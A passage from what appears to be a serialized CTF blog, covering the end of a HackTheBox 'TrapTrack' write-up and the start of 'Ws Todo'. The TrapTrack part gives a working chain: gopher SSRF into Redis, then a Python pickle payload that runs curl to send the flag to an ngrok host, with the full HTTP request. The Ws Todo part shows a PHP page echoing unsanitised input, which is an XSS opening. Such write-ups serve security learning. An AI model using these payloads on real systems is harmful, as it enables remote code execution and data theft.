ss":130,"line":739},[44644,44648,44652,44656,44661,44665,44670,44674,44678],{"type":33,"tag":128,"props":44645,"children":44646},{"style":437},[44647],{"type":38,"value":31388},{"type":33,"tag":128,"props":44649,"children":44650},{"style":312},[44651],{"type":38,"value":5566},{"type":33,"tag":128,"props":44653,"children":44654},{"style":300},[44655],{"type":38,"value":11107},{"type":33,"tag":128,"props":44657,"children":44658},{"style":140},[44659],{"type":38,"value":44660},"\"gopher://127.0.0.1:6379/_",{"type":33,"tag":128,"props":44662,"children":44663},{"style":151},[44664],{"type":38,"value":7246},{"type":33,"tag":128,"props":44666,"children":44667},{"style":323},[44668],{"type":38,"value":44669},"formted_redis_cmd",{"type":33,"tag":128,"props":44671,"children":44672},{"style":151},[44673],{"type":38,"value":5730},{"type":33,"tag":128,"props":44675,"children":44676},{"style":140},[44677],{"type":38,"value":669},{"type":33,"tag":128,"props":44679,"children":44680},{"style":312},[44681],{"type":38,"value":2427},{"type":33,"tag":47,"props":44683,"children":44684},{},[44685],{"type":38,"value":44686},"We can now create a payload to see if we can modify the keys of the Redis database.",{"type":33,"tag":114,"props":44688,"children":44689},{},[44690],{"type":33,"tag":119,"props":44691,"children":44693},{"code":44692},"HSET jobs 101 AAAAAAAAA\nHGET jobs 101\nquit\n",[44694],{"type":33,"tag":105,"props":44695,"children":44696},{"__ignoreMap":8},[44697],{"type":38,"value":44692},{"type":33,"tag":47,"props":44699,"children":44700},{},[44701,44703,44708,44710,44716,44718,44723,44725,44730],{"type":38,"value":44702},"Here we set at the key ",{"type":33,"tag":105,"props":44704,"children":44706},{"className":44705},[],[44707],{"type":38,"value":44240},{"type":38,"value":44709}," the value ",{"type":33,"tag":105,"props":44711,"children":44713},{"className":44712},[],[44714],{"type":38,"value":44715},"AAAAAAAAAA",{"type":38,"value":44717}," at the index ",{"type":33,"tag":105,"props":44719,"children":44721},{"className":44720},[],[44722],{"type":38,"value":32839},{"type":38,"value":44724},". and we get the value at the index ",{"type":33,"tag":105,"props":44726,"children":44728},{"className":44727},[],[44729],{"type":38,"value":32839},{"type":38,"value":215},{"type":33,"tag":47,"props":44732,"children":44733},{},[44734],{"type":38,"value":44735},"With the result of the previous script, we have the following payload:",{"type":33,"tag":114,"props":44737,"children":44738},{},[44739],{"type":33,"tag":119,"props":44740,"children":44742},{"code":44741},"{\"trapName\":\"hello\",\"trapURL\":\"gopher://127.0.0.1:6379/_%0D%0AHSET%20jobs%20101%20AAAAAAAAA%0D%0AHGET%20jobs%20101%0D%0Aquit%0D%0A\"}\n",[44743],{"type":33,"tag":105,"props":44744,"children":44745},{"__ignoreMap":8},[44746],{"type":38,"value":44741},{"type":33,"tag":47,"props":44748,"children":44749},{},[44750],{"type":38,"value":44751},"And we have the result:",{"type":33,"tag":114,"props":44753,"children":44754},{},[44755],{"type":33,"tag":119,"props":44756,"children":44758},{"code":44757},":0\n$9\nAAAAAAAAA\n+OK\n",[44759],{"type":33,"tag":105,"props":44760,"children":44761},{"__ignoreMap":8},[44762],{"type":38,"value":44757},{"type":33,"tag":47,"props":44764,"children":44765},{},[44766],{"type":38,"value":44767},"With this payload, we have shown that it is possible to pollute a key that is located in Redis.",{"type":33,"tag":40,"props":44769,"children":44771},{"id":44770},"rce-via-unpickle",[44772],{"type":38,"value":44773},"RCE via unpickle",{"type":33,"tag":47,"props":44775,"children":44776},{},[44777,44779,44785,44787,44793],{"type":38,"value":44778},"If we take a look at the ",{"type":33,"tag":105,"props":44780,"children":44782},{"className":44781},[],[44783],{"type":38,"value":44784},"get_job_queue",{"type":38,"value":44786}," function in ",{"type":33,"tag":105,"props":44788,"children":44790},{"className":44789},[],[44791],{"type":38,"value":44792},"cache.py",{"type":38,"value":44794},", we can see that this function retrieves a key from Redis, and then unpickle it.",{"type":33,"tag":114,"props":44796,"children":44797},{"lang":10227},[44798],{"type":33,"tag":119,"props":44799,"children":44801},{"code":44800,"language":10227,"meta":8,"className":10231,"style":8},"def get_job_queue(job_id):\n data = current_app.redis.hget(env('REDIS_JOBS'), job_id)\n if data:\n return pickle.loads(base64.b64decode(data))\n return None\n",[44802],{"type":33,"tag":105,"props":44803,"children":44804},{"__ignoreMap":8},[44805,44829,44901,44916,44967],{"type":33,"tag":128,"props":44806,"children":44807},{"class":130,"line":131},[44808,44812,44817,44821,44825],{"type":33,"tag":128,"props":44809,"children":44810},{"style":300},[44811],{"type":38,"value":10402},{"type":33,"tag":128,"props":44813,"children":44814},{"style":135},[44815],{"type":38,"value":44816}," get_job_queue",{"type":33,"tag":128,"props":44818,"children":44819},{"style":312},[44820],{"type":38,"value":5566},{"type":33,"tag":128,"props":44822,"children":44823},{"style":323},[44824],{"type":38,"value":44389},{"type":33,"tag":128,"props":44826,"children":44827},{"style":312},[44828],{"type":38,"value":10497},{"type":33,"tag":128,"props":44830,"children":44831},{"class":130,"line":362},[44832,44837,44841,44846,44850,44855,44859,44864,44868,44872,44876,44880,44884,44888,44892,44897],{"type":33,"tag":128,"props":44833,"children":44834},{"style":323},[44835],{"type":38,"value":44836}," data ",{"type":33,"tag":128,"props":44838,"children":44839},{"style":312},[44840],{"type":38,"value":315},{"type":33,"tag":128,"props":44842,"children":44843},{"style":323},[44844],{"type":38,"value":44845}," current_app",{"type":33,"tag":128,"props":44847,"children":44848},{"style":312},[44849],{"type":38,"value":215},{"type":33,"tag":128,"props":44851,"children":44852},{"style":323},[44853],{"type":38,"value":44854},"redis",{"type":33,"tag":128,"props":44856,"children":44857},{"style":312},[44858],{"type":38,"value":215},{"type":33,"tag":128,"props":44860,"children":44861},{"style":323},[44862],{"type":38,"value":44863},"hget",{"type":33,"tag":128,"props":44865,"children":44866},{"style":312},[44867],{"type":38,"value":5566},{"type":33,"tag":128,"props":44869,"children":44870},{"style":323},[44871],{"type":38,"value":44351},{"type":33,"tag":128,"props":44873,"children":44874},{"style":312},[44875],{"type":38,"value":5566},{"type":33,"tag":128,"props":44877,"children":44878},{"style":676},[44879],{"type":38,"value":6040},{"type":33,"tag":128,"props":44881,"children":44882},{"style":140},[44883],{"type":38,"value":44223},{"type":33,"tag":128,"props":44885,"children":44886},{"style":676},[44887],{"type":38,"value":6040},{"type":33,"tag":128,"props":44889,"children":44890},{"style":312},[44891],{"type":38,"value":30055},{"type":33,"tag":128,"props":44893,"children":44894},{"style":323},[44895],{"type":38,"value":44896}," job_id",{"type":33,"tag":128,"props":44898,"children":44899},{"style":312},[44900],{"type":38,"value":2427},{"type":33,"tag":128,"props":44902,"children":44903},{"class":130,"line":403},[44904,44908,44912],{"type":33,"tag":128,"props":44905,"children":44906},{"style":1576},[44907],{"type":38,"value":6625},{"type":33,"tag":128,"props":44909,"children":44910},{"style":323},[44911],{"type":38,"value":13545},{"type":33,"tag":128,"props":44913,"children":44914},{"style":312},[44915],{"type":38,"value":5318},{"type":33,"tag":128,"props":44917,"children":44918},{"class":130,"line":739},[44919,44923,44928,44932,44937,44941,44946,44950,44955,44959,44963],{"type":33,"tag":128,"props":44920,"children":44921},{"style":1576},[44922],{"type":38,"value":13615},{"type":33,"tag":128,"props":44924,"children":44925},{"style":323},[44926],{"type":38,"value":44927}," pickle",{"type":33,"tag":128,"props":44929,"children":44930},{"style":312},[44931],{"type":38,"value":215},{"type":33,"tag":128,"props":44933,"children":44934},{"style":323},[44935],{"type":38,"value":44936},"loads",{"type":33,"tag":128,"props":44938,"children":44939},{"style":312},[44940],{"type":38,"value":5566},{"type":33,"tag":128,"props":44942,"children":44943},{"style":323},[44944],{"type":38,"value":44945},"base64",{"type":33,"tag":128,"props":44947,"children":44948},{"style":312},[44949],{"type":38,"value":215},{"type":33,"tag":128,"props":44951,"children":44952},{"style":323},[44953],{"type":38,"value":44954},"b64decode",{"type":33,"tag":128,"props":44956,"children":44957},{"style":312},[44958],{"type":38,"value":5566},{"type":33,"tag":128,"props":44960,"children":44961},{"style":323},[44962],{"type":38,"value":2815},{"type":33,"tag":128,"props":44964,"children":44965},{"style":312},[44966],{"type":38,"value":2459},{"type":33,"tag":128,"props":44968,"children":44969},{"class":130,"line":765},[44970,44974],{"type":33,"tag":128,"props":44971,"children":44972},{"style":1576},[44973],{"type":38,"value":6810},{"type":33,"tag":128,"props":44975,"children":44976},{"style":1576},[44977],{"type":38,"value":44978}," None\n",{"type":33,"tag":47,"props":44980,"children":44981},{},[44982,44984,44990],{"type":38,"value":44983},"This function is used when we call the route ",{"type":33,"tag":105,"props":44985,"children":44987},{"className":44986},[],[44988],{"type":38,"value":44989},"/admin/jobs/\u003Cjob_id>",{"type":38,"value":215},{"type":33,"tag":47,"props":44992,"children":44993},{},[44994],{"type":38,"value":44995},"Unpickle in Python without any protection is quite vulnerable as it allows malicious code to be executed on the Python server.",{"type":33,"tag":47,"props":44997,"children":44998},{},[44999],{"type":38,"value":45000},"If we resume our path. We know that it is now possible to change a value corresponding to the id of a job in Redis, that an unpickle which takes a value from Redis is vulnerable and allows us to execute malicious code.",{"type":33,"tag":47,"props":45002,"children":45003},{},[45004],{"type":38,"value":45005},"Now, we just need to craft our payload that will be executed by unpickle. And call the route that will be responsible for unpickling in order to achieve RCE.",{"type":33,"tag":47,"props":45007,"children":45008},{},[45009],{"type":38,"value":45010},"We will use the following script to generate our base64 pickle payload:",{"type":33,"tag":114,"props":45012,"children":45013},{"lang":10227},[45014],{"type":33,"tag":119,"props":45015,"children":45017},{"code":45016,"language":10227,"meta":8,"className":10231,"style":8},"# create_pickle_payload.py\n# create_pickle_payload.py\nimport pickle\nimport base64\n\nclass RCE:\n def __reduce__(self):\n import os\n cmd = ('curl \"http://b536-91-69-133-214.ngrok.io/\"$(/readflag | base64)')\n return os.system, (cmd,)\n\n\nif __name__ == '__main__':\n pickled = pickle.dumps(RCE())\n print(base64.urlsafe_b64encode(pickled).decode())\n",[45018],{"type":33,"tag":105,"props":45019,"children":45020},{"__ignoreMap":8},[45021,45029,45036,45048,45059,45066,45082,45106,45119,45152,45191,45198,45205,45236,45274],{"type":33,"tag":128,"props":45022,"children":45023},{"class":130,"line":131},[45024],{"type":33,"tag":128,"props":45025,"children":45026},{"style":5541},[45027],{"type":38,"value":45028},"# create_pickle_payload.py\n",{"type":33,"tag":128,"props":45030,"children":45031},{"class":130,"line":362},[45032],{"type":33,"tag":128,"props":45033,"children":45034},{"style":5541},[45035],{"type":38,"value":45028},{"type":33,"tag":128,"props":45037,"children":45038},{"class":130,"line":403},[45039,45043],{"type":33,"tag":128,"props":45040,"children":45041},{"style":1576},[45042],{"type":38,"value":10244},{"type":33,"tag":128,"props":45044,"children":45045},{"style":323},[45046],{"type":38,"value":45047}," pickle\n",{"type":33,"tag":128,"props":45049,"children":45050},{"class":130,"line":739},[45051,45055],{"type":33,"tag":128,"props":45052,"children":45053},{"style":1576},[45054],{"type":38,"value":10244},{"type":33,"tag":128,"props":45056,"children":45057},{"style":323},[45058],{"type":38,"value":10261},{"type":33,"tag":128,"props":45060,"children":45061},{"class":130,"line":765},[45062],{"type":33,"tag":128,"props":45063,"children":45064},{"emptyLinePlaceholder":896},[45065],{"type":38,"value":899},{"type":33,"tag":128,"props":45067,"children":45068},{"class":130,"line":804},[45069,45073,45078],{"type":33,"tag":128,"props":45070,"children":45071},{"style":300},[45072],{"type":38,"value":30336},{"type":33,"tag":128,"props":45074,"children":45075},{"style":30339},[45076],{"type":38,"value":45077}," RCE",{"type":33,"tag":128,"props":45079,"children":45080},{"style":312},[45081],{"type":38,"value":5318},{"type":33,"tag":128,"props":45083,"children":45084},{"class":130,"line":839},[45085,45089,45094,45098,45102],{"type":33,"tag":128,"props":45086,"children":45087},{"style":300},[45088],{"type":38,"value":30678},{"type":33,"tag":128,"props":45090,"children":45091},{"style":437},[45092],{"type":38,"value":45093}," __reduce__",{"type":33,"tag":128,"props":45095,"children":45096},{"style":312},[45097],{"type":38,"value":5566},{"type":33,"tag":128,"props":45099,"children":45100},{"style":323},[45101],{"type":38,"value":30091},{"type":33,"tag":128,"props":45103,"children":45104},{"style":312},[45105],{"type":38,"value":10497},{"type":33,"tag":128,"props":45107,"children":45108},{"class":130,"line":848},[45109,45114],{"type":33,"tag":128,"props":45110,"children":45111},{"style":1576},[45112],{"type":38,"value":45113}," import",{"type":33,"tag":128,"props":45115,"children":45116},{"style":323},[45117],{"type":38,"value":45118}," os\n",{"type":33,"tag":128,"props":45120,"children":45121},{"class":130,"line":976},[45122,45127,45131,45135,45139,45144,45148],{"type":33,"tag":128,"props":45123,"children":45124},{"style":323},[45125],{"type":38,"value":45126}," cmd ",{"type":33,"tag":128,"props":45128,"children":45129},{"style":312},[45130],{"type":38,"value":315},{"type":33,"tag":128,"props":45132,"children":45133},{"style":312},[45134],{"type":38,"value":2852},{"type":33,"tag":128,"props":45136,"children":45137},{"style":676},[45138],{"type":38,"value":6040},{"type":33,"tag":128,"props":45140,"children":45141},{"style":140},[45142],{"type":38,"value":45143},"curl \"http://b536-91-69-133-214.ngrok.io/\"$(/readflag | base64)",{"type":33,"tag":128,"props":45145,"children":45146},{"style":676},[45147],{"type":38,"value":6040},{"type":33,"tag":128,"props":45149,"children":45150},{"style":312},[45151],{"type":38,"value":2427},{"type":33,"tag":128,"props":45153,"children":45154},{"class":130,"line":988},[45155,45159,45164,45168,45173,45177,45181,45186],{"type":33,"tag":128,"props":45156,"children":45157},{"style":1576},[45158],{"type":38,"value":13615},{"type":33,"tag":128,"props":45160,"children":45161},{"style":323},[45162],{"type":38,"value":45163}," os",{"type":33,"tag":128,"props":45165,"children":45166},{"style":312},[45167],{"type":38,"value":215},{"type":33,"tag":128,"props":45169,"children":45170},{"style":323},[45171],{"type":38,"value":45172},"system",{"type":33,"tag":128,"props":45174,"children":45175},{"style":312},[45176],{"type":38,"value":5584},{"type":33,"tag":128,"props":45178,"children":45179},{"style":312},[45180],{"type":38,"value":2852},{"type":33,"tag":128,"props":45182,"children":45183},{"style":323},[45184],{"type":38,"value":45185},"cmd",{"type":33,"tag":128,"props":45187,"children":45188},{"style":312},[45189],{"type":38,"value":45190},",)\n",{"type":33,"tag":128,"props":45192,"children":45193},{"class":130,"line":1001},[45194],{"type":33,"tag":128,"props":45195,"children":45196},{"emptyLinePlaceholder":896},[45197],{"type":38,"value":899},{"type":33,"tag":128,"props":45199,"children":45200},{"class":130,"line":1014},[45201],{"type":33,"tag":128,"props":45202,"children":45203},{"emptyLinePlaceholder":896},[45204],{"type":38,"value":899},{"type":33,"tag":128,"props":45206,"children":45207},{"class":130,"line":1026},[45208,45212,45216,45220,45224,45228,45232],{"type":33,"tag":128,"props":45209,"children":45210},{"style":1576},[45211],{"type":38,"value":10991},{"type":33,"tag":128,"props":45213,"children":45214},{"style":437},[45215],{"type":38,"value":10996},{"type":33,"tag":128,"props":45217,"children":45218},{"style":300},[45219],{"type":38,"value":11001},{"type":33,"tag":128,"props":45221,"children":45222},{"style":676},[45223],{"type":38,"value":6739},{"type":33,"tag":128,"props":45225,"children":45226},{"style":140},[45227],{"type":38,"value":11010},{"type":33,"tag":128,"props":45229,"children":45230},{"style":676},[45231],{"type":38,"value":6040},{"type":33,"tag":128,"props":45233,"children":45234},{"style":312},[45235],{"type":38,"value":5318},{"type":33,"tag":128,"props":45237,"children":45238},{"class":130,"line":1038},[45239,45244,45248,45252,45256,45260,45264,45269],{"type":33,"tag":128,"props":45240,"children":45241},{"style":323},[45242],{"type":38,"value":45243}," pickled ",{"type":33,"tag":128,"props":45245,"children":45246},{"style":312},[45247],{"type":38,"value":315},{"type":33,"tag":128,"props":45249,"children":45250},{"style":323},[45251],{"type":38,"value":44927},{"type":33,"tag":128,"props":45253,"children":45254},{"style":312},[45255],{"type":38,"value":215},{"type":33,"tag":128,"props":45257,"children":45258},{"style":323},[45259],{"type":38,"value":44427},{"type":33,"tag":128,"props":45261,"children":45262},{"style":312},[45263],{"type":38,"value":5566},{"type":33,"tag":128,"props":45265,"children":45266},{"style":323},[45267],{"type":38,"value":45268},"RCE",{"type":33,"tag":128,"props":45270,"children":45271},{"style":312},[45272],{"type":38,"value":45273},"())\n",{"type":33,"tag":128,"props":45275,"children":45276},{"class":130,"line":1051},[45277,45281,45285,45289,45293,45298,45302,45307,45311,45315],{"type":33,"tag":128,"props":45278,"children":45279},{"style":437},[45280],{"type":38,"value":10650},{"type":33,"tag":128,"props":45282,"children":45283},{"style":312},[45284],{"type":38,"value":5566},{"type":33,"tag":128,"props":45286,"children":45287},{"style":323},[45288],{"type":38,"value":44945},{"type":33,"tag":128,"props":45290,"children":45291},{"style":312},[45292],{"type":38,"value":215},{"type":33,"tag":128,"props":45294,"children":45295},{"style":323},[45296],{"type":38,"value":45297},"urlsafe_b64encode",{"type":33,"tag":128,"props":45299,"children":45300},{"style":312},[45301],{"type":38,"value":5566},{"type":33,"tag":128,"props":45303,"children":45304},{"style":323},[45305],{"type":38,"value":45306},"pickled",{"type":33,"tag":128,"props":45308,"children":45309},{"style":312},[45310],{"type":38,"value":6700},{"type":33,"tag":128,"props":45312,"children":45313},{"style":323},[45314],{"type":38,"value":10820},{"type":33,"tag":128,"props":45316,"children":45317},{"style":312},[45318],{"type":38,"value":45273},{"type":33,"tag":114,"props":45320,"children":45321},{},[45322],{"type":33,"tag":119,"props":45323,"children":45325},{"code":45324},"$> python pickle_rce.py\ngASVWgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjD9jdXJsICJodHRwOi8vYjUzNi05MS02OS0xMzMtMjE0Lm5ncm9rLmlvLyIkKC9yZWFkZmxhZyB8IGJhc2U2NCmUhZRSlC4=\n",[45326],{"type":33,"tag":105,"props":45327,"children":45328},{"__ignoreMap":8},[45329],{"type":38,"value":45324},{"type":33,"tag":47,"props":45331,"children":45332},{},[45333],{"type":38,"value":45334},"Now that we have the value of the key, we need to use it in our script that allows us to change the keys in Redis. This is necessary for us to have the final payload.",{"type":33,"tag":114,"props":45336,"children":45337},{},[45338],{"type":33,"tag":119,"props":45339,"children":45341},{"code":45340},"HSET jobs 101 gASVWgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjD9jdXJsICJodHRwOi8vYjUzNi05MS02OS0xMzMtMjE0Lm5ncm9rLmlvLyIkKC9yZWFkZmxhZyB8IGJhc2U2NCmUhZRSlC4=\nHGET jobs 101\nquit\n",[45342],{"type":33,"tag":105,"props":45343,"children":45344},{"__ignoreMap":8},[45345],{"type":38,"value":45340},{"type":33,"tag":114,"props":45347,"children":45348},{},[45349],{"type":33,"tag":119,"props":45350,"children":45352},{"code":45351},"POST /api/tracks/add HTTP/1.1\nHost: localhost:1337\nReferer: http://localhost:1337/admin/\nContent-Type: application/json\nContent-Length: 259\nOrigin: http://localhost:1337\nConnection: close\nCookie: session=8e3c330d-3f69-475a-9924-9638f040b30e\n\n{\"trapName\":\"hello\",\"trapURL\":\"gopher://127.0.0.1:6379/_%0D%0AHSET%20jobs%20101%20gASVWgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjD9jdXJsICJodHRwOi8vYjUzNi05MS02OS0xMzMtMjE0Lm5ncm9rLmlvLyIkKC9yZWFkZmxhZyB8IGJhc2U2NCmUhZRSlC4=%0D%0AHGET%20jobs%20101%0D%0Aquit%0D%0A\"}\n",[45353],{"type":33,"tag":105,"props":45354,"children":45355},{"__ignoreMap":8},[45356],{"type":38,"value":45351},{"type":33,"tag":47,"props":45358,"children":45359},{},[45360,45362,45368],{"type":38,"value":45361},"And then we just have to visit this URL: ",{"type":33,"tag":53,"props":45363,"children":45366},{"href":45364,"rel":45365},"http://localhost:1337/api/tracks/101/status",[57],[45367],{"type":38,"value":45364},{"type":38,"value":45369}," to get the result on our Ngrok.",{"type":33,"tag":32400,"props":45371,"children":45373},{"width":40587,"src":45372},"https://user-images.githubusercontent.com/28403617/227367481-54f89c35-60da-44be-adfe-de5f12d5ae52.png",[],{"type":33,"tag":5227,"props":45375,"children":45376},{},[45377],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":45379},[45380,45381,45382,45383,45384],{"id":42,"depth":362,"text":45},{"id":22881,"depth":362,"text":22884},{"id":43499,"depth":362,"text":43502},{"id":43976,"depth":362,"text":43979},{"id":44770,"depth":362,"text":44773},"content:writeups:traptrack.md","writeups/traptrack.md","writeups/traptrack",{"_path":45389,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":45390,"description":8,"head":45391,"body":45407,"_type":5240,"_id":52779,"_source":5242,"_file":52780,"_stem":52781,"_extension":5245},"/writeups/ws-todo","Ws Todo",{"title":45390,"description":45392,"keywords":45393,"slug":45394,"image":45395,"date":45396,"meta":45397},"Ws todo is a medium web challenge from htb. This challenge is about websockets and xss.","web,websockets,xss,puppeteer","ws-todo","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743778294/writeups/htb.webp","2022-12-26",[45398,45399,45401,45402,45403,45405],{"og:description":45392},{"og:title":45400},"Ws todo writeup",{"og:image":45395},{"description":45392},{"title":45404},"Ws Todo writeup",{"keywords":45406},"web,websockets,xss,puppeteer,htb,ctf",{"type":30,"children":45408,"toc":52771},[45409,45413,45417,45437,45457,45463,45482,45977,45996,46002,46014,46027,46341,46346,47325,47343,47356,48723,48734,48740,48753,50928,50969,51340,51351,51362,51403,51414,51420,51425,51547,51559,51564,51575,51580,51591,51713,51756,51761,51920,51924,51943,52455,52460,52586,52598,52610,52762,52767],{"type":33,"tag":34,"props":45410,"children":45411},{"id":45394},[45412],{"type":38,"value":45390},{"type":33,"tag":40,"props":45414,"children":45415},{"id":42},[45416],{"type":38,"value":45},{"type":33,"tag":47,"props":45418,"children":45419},{},[45420,45422,45428,45430,45436],{"type":38,"value":45421},"Ws Todo is an medium web challenge from HTB.\nThere are two webs apps running on the machine, one is a ",{"type":33,"tag":105,"props":45423,"children":45425},{"className":45424},[],[45426],{"type":38,"value":45427},"todo app",{"type":38,"value":45429}," and the other is a ",{"type":33,"tag":105,"props":45431,"children":45433},{"className":45432},[],[45434],{"type":38,"value":45435},"html tester",{"type":38,"value":215},{"type":33,"tag":47,"props":45438,"children":45439},{},[45440,45442,45448,45450,45456],{"type":38,"value":45441},"The flag is in the todo element of the todo app. But it protected and we need to have ",{"type":33,"tag":105,"props":45443,"children":45445},{"className":45444},[],[45446],{"type":38,"value":45447},"userId == 1",{"type":38,"value":45449}," to access it. Furthermore, the content of a todo is encryted with a ",{"type":33,"tag":105,"props":45451,"children":45453},{"className":45452},[],[45454],{"type":38,"value":45455},"secret key",{"type":38,"value":215},{"type":33,"tag":81,"props":45458,"children":45460},{"id":45459},"html-tester",[45461],{"type":38,"value":45462},"HTML Tester",{"type":33,"tag":47,"props":45464,"children":45465},{},[45466,45468,45473,45475,45480],{"type":38,"value":45467},"The HTML tester is a simple php file, that is get a parameter ",{"type":33,"tag":105,"props":45469,"children":45471},{"className":45470},[],[45472],{"type":38,"value":5929},{"type":38,"value":45474}," from url and display it inside a ",{"type":33,"tag":105,"props":45476,"children":45478},{"className":45477},[],[45479],{"type":38,"value":8671},{"type":38,"value":45481}," statement.",{"type":33,"tag":114,"props":45483,"children":45484},{"lang":40629},[45485],{"type":33,"tag":119,"props":45486,"children":45488},{"code":45487,"language":40629,"meta":8,"className":40634,"style":8},"\u003Chtml>\n \u003Cbody>\n \u003C?php if (isset($_GET['html'])): ?>\n \u003C?php echo $_GET['html']; ?>\n \u003C?php else: ?>\n \u003Ch1>HTML Tester\u003C/h1>\n \u003Cp>Internal development tool\u003C/p>\n \u003Cform action=\"index.php\" method=\"get\">\n \u003Cinput type=\"text\" name=\"html\" />\n \u003Cinput type=\"submit\" value=\"Submit\" />\n \u003C/form>\n \u003C?php endif; ?>\n \u003C/body>\n\u003C/html>\n",[45489],{"type":33,"tag":105,"props":45490,"children":45491},{"__ignoreMap":8},[45492,45507,45522,45586,45636,45659,45697,45739,45795,45851,45907,45923,45947,45962],{"type":33,"tag":128,"props":45493,"children":45494},{"class":130,"line":131},[45495,45499,45503],{"type":33,"tag":128,"props":45496,"children":45497},{"style":300},[45498],{"type":38,"value":5977},{"type":33,"tag":128,"props":45500,"children":45501},{"style":151},[45502],{"type":38,"value":5929},{"type":33,"tag":128,"props":45504,"children":45505},{"style":300},[45506],{"type":38,"value":6097},{"type":33,"tag":128,"props":45508,"children":45509},{"class":130,"line":362},[45510,45514,45518],{"type":33,"tag":128,"props":45511,"children":45512},{"style":300},[45513],{"type":38,"value":6105},{"type":33,"tag":128,"props":45515,"children":45516},{"style":151},[45517],{"type":38,"value":5671},{"type":33,"tag":128,"props":45519,"children":45520},{"style":300},[45521],{"type":38,"value":6097},{"type":33,"tag":128,"props":45523,"children":45524},{"class":130,"line":403},[45525,45530,45534,45538,45542,45547,45551,45556,45560,45564,45568,45572,45577,45581],{"type":33,"tag":128,"props":45526,"children":45527},{"style":300},[45528],{"type":38,"value":45529}," \u003C?",{"type":33,"tag":128,"props":45531,"children":45532},{"style":151},[45533],{"type":38,"value":40629},{"type":33,"tag":128,"props":45535,"children":45536},{"style":1576},[45537],{"type":38,"value":14274},{"type":33,"tag":128,"props":45539,"children":45540},{"style":312},[45541],{"type":38,"value":2852},{"type":33,"tag":128,"props":45543,"children":45544},{"style":437},[45545],{"type":38,"value":45546},"isset",{"type":33,"tag":128,"props":45548,"children":45549},{"style":312},[45550],{"type":38,"value":40659},{"type":33,"tag":128,"props":45552,"children":45553},{"style":306},[45554],{"type":38,"value":45555},"_GET",{"type":33,"tag":128,"props":45557,"children":45558},{"style":312},[45559],{"type":38,"value":344},{"type":33,"tag":128,"props":45561,"children":45562},{"style":676},[45563],{"type":38,"value":6040},{"type":33,"tag":128,"props":45565,"children":45566},{"style":140},[45567],{"type":38,"value":5929},{"type":33,"tag":128,"props":45569,"children":45570},{"style":676},[45571],{"type":38,"value":6040},{"type":33,"tag":128,"props":45573,"children":45574},{"style":312},[45575],{"type":38,"value":45576},"]))",{"type":33,"tag":128,"props":45578,"children":45579},{"style":300},[45580],{"type":38,"value":284},{"type":33,"tag":128,"props":45582,"children":45583},{"style":300},[45584],{"type":38,"value":45585}," ?>\n",{"type":33,"tag":128,"props":45587,"children":45588},{"class":130,"line":739},[45589,45594,45598,45603,45607,45611,45615,45619,45623,45627,45632],{"type":33,"tag":128,"props":45590,"children":45591},{"style":300},[45592],{"type":38,"value":45593}," \u003C?",{"type":33,"tag":128,"props":45595,"children":45596},{"style":151},[45597],{"type":38,"value":40629},{"type":33,"tag":128,"props":45599,"children":45600},{"style":437},[45601],{"type":38,"value":45602}," echo",{"type":33,"tag":128,"props":45604,"children":45605},{"style":312},[45606],{"type":38,"value":40686},{"type":33,"tag":128,"props":45608,"children":45609},{"style":306},[45610],{"type":38,"value":45555},{"type":33,"tag":128,"props":45612,"children":45613},{"style":312},[45614],{"type":38,"value":344},{"type":33,"tag":128,"props":45616,"children":45617},{"style":676},[45618],{"type":38,"value":6040},{"type":33,"tag":128,"props":45620,"children":45621},{"style":140},[45622],{"type":38,"value":5929},{"type":33,"tag":128,"props":45624,"children":45625},{"style":676},[45626],{"type":38,"value":6040},{"type":33,"tag":128,"props":45628,"children":45629},{"style":312},[45630],{"type":38,"value":45631},"];",{"type":33,"tag":128,"props":45633,"children":45634},{"style":300},[45635],{"type":38,"value":45585},{"type":33,"tag":128,"props":45637,"children":45638},{"class":130,"line":765},[45639,45643,45647,45651,45655],{"type":33,"tag":128,"props":45640,"children":45641},{"style":300},[45642],{"type":38,"value":45529},{"type":33,"tag":128,"props":45644,"children":45645},{"style":151},[45646],{"type":38,"value":40629},{"type":33,"tag":128,"props":45648,"children":45649},{"style":1576},[45650],{"type":38,"value":14269},{"type":33,"tag":128,"props":45652,"children":45653},{"style":300},[45654],{"type":38,"value":284},{"type":33,"tag":128,"props":45656,"children":45657},{"style":300},[45658],{"type":38,"value":45585},{"type":33,"tag":128,"props":45660,"children":45661},{"class":130,"line":804},[45662,45667,45671,45675,45680,45685,45689,45693],{"type":33,"tag":128,"props":45663,"children":45664},{"style":300},[45665],{"type":38,"value":45666}," \u003C",{"type":33,"tag":128,"props":45668,"children":45669},{"style":151},[45670],{"type":38,"value":34},{"type":33,"tag":128,"props":45672,"children":45673},{"style":300},[45674],{"type":38,"value":6054},{"type":33,"tag":128,"props":45676,"children":45677},{"style":151},[45678],{"type":38,"value":45679},"HTML",{"type":33,"tag":128,"props":45681,"children":45682},{"style":151},[45683],{"type":38,"value":45684}," Tester",{"type":33,"tag":128,"props":45686,"children":45687},{"style":300},[45688],{"type":38,"value":6190},{"type":33,"tag":128,"props":45690,"children":45691},{"style":151},[45692],{"type":38,"value":34},{"type":33,"tag":128,"props":45694,"children":45695},{"style":300},[45696],{"type":38,"value":6097},{"type":33,"tag":128,"props":45698,"children":45699},{"class":130,"line":839},[45700,45704,45708,45712,45717,45722,45727,45731,45735],{"type":33,"tag":128,"props":45701,"children":45702},{"style":300},[45703],{"type":38,"value":45666},{"type":33,"tag":128,"props":45705,"children":45706},{"style":151},[45707],{"type":38,"value":47},{"type":33,"tag":128,"props":45709,"children":45710},{"style":300},[45711],{"type":38,"value":6054},{"type":33,"tag":128,"props":45713,"children":45714},{"style":151},[45715],{"type":38,"value":45716},"Internal",{"type":33,"tag":128,"props":45718,"children":45719},{"style":151},[45720],{"type":38,"value":45721}," development",{"type":33,"tag":128,"props":45723,"children":45724},{"style":151},[45725],{"type":38,"value":45726}," 